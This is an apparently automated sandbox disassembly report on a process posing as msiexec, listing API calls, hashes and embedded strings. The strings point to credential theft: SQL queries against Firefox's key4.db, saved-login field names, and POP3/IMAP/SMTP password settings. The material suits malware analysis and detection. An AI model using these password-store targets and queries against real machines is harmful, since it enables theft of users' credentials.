                                                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID:
                                                    • API String ID: 145871493-0
                                                    • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                    • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                    APIs
                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                    • String ID:
                                                    • API String ID: 4165544737-0
                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                    APIs
                                                    • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                    APIs
                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                    APIs
                                                    • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                    APIs
                                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: CloseFind
                                                    • String ID:
                                                    • API String ID: 1863332320-0
                                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                    APIs
                                                    • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                    • API String ID: 2238633743-192783356
                                                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                    • API String ID: 3963849919-1658304561
                                                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@??3@memcpymemset
                                                    • String ID: (yE$(yE$(yE
                                                    • API String ID: 1865533344-362086290
                                                    • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                    • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                    APIs
                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                    • memset.MSVCRT ref: 0040E5B8
                                                    • memset.MSVCRT ref: 0040E5CD
                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                    • memset.MSVCRT ref: 0040E6B5
                                                    • memset.MSVCRT ref: 0040E6CC
                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                      • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                    • memset.MSVCRT ref: 0040E736
                                                    • memset.MSVCRT ref: 0040E74F
                                                    • sprintf.MSVCRT ref: 0040E76D
                                                    • sprintf.MSVCRT ref: 0040E788
                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                    • memset.MSVCRT ref: 0040E858
                                                    • sprintf.MSVCRT ref: 0040E873
                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                    • API String ID: 4171719235-3943159138
                                                    • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                    • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                    • GetDC.USER32 ref: 004104E2
                                                    • strlen.MSVCRT ref: 00410522
                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                    • sprintf.MSVCRT ref: 00410640
                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                    • String ID: %s:$EDIT$STATIC
                                                    • API String ID: 1703216249-3046471546
                                                    • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                    • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                    APIs
                                                    • memset.MSVCRT ref: 004024F5
                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,68207B60,?,00000000), ref: 00402533
                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _mbscpy$QueryValuememset
                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                    • API String ID: 168965057-606283353
                                                    • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                    • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                    • memset.MSVCRT ref: 0040128E
                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                    • String ID:
                                                    • API String ID: 2998058495-0
                                                    • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                    • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                    APIs
                                                    • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                    • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                    • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                    • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                    • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                    • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcmp$memcpy
                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                    • API String ID: 231171946-2189169393
                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                    • API String ID: 633282248-1996832678
                                                    • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                    • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                    APIs
                                                    • memset.MSVCRT ref: 00406782
                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                    • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                    • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                    • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                    • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                    • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                    Strings
                                                    • , xrefs: 00406834
                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                    • key4.db, xrefs: 00406756
                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                    • API String ID: 3614188050-3983245814
                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: sprintf$memset$_mbscpy
                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                    • API String ID: 3402215030-3842416460
                                                    • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                    • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                    APIs
                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                    • strlen.MSVCRT ref: 0040F139
                                                    • strlen.MSVCRT ref: 0040F147
                                                    • memset.MSVCRT ref: 0040F187
                                                    • strlen.MSVCRT ref: 0040F196
                                                    • strlen.MSVCRT ref: 0040F1A4
                                                    • memset.MSVCRT ref: 0040F1EA
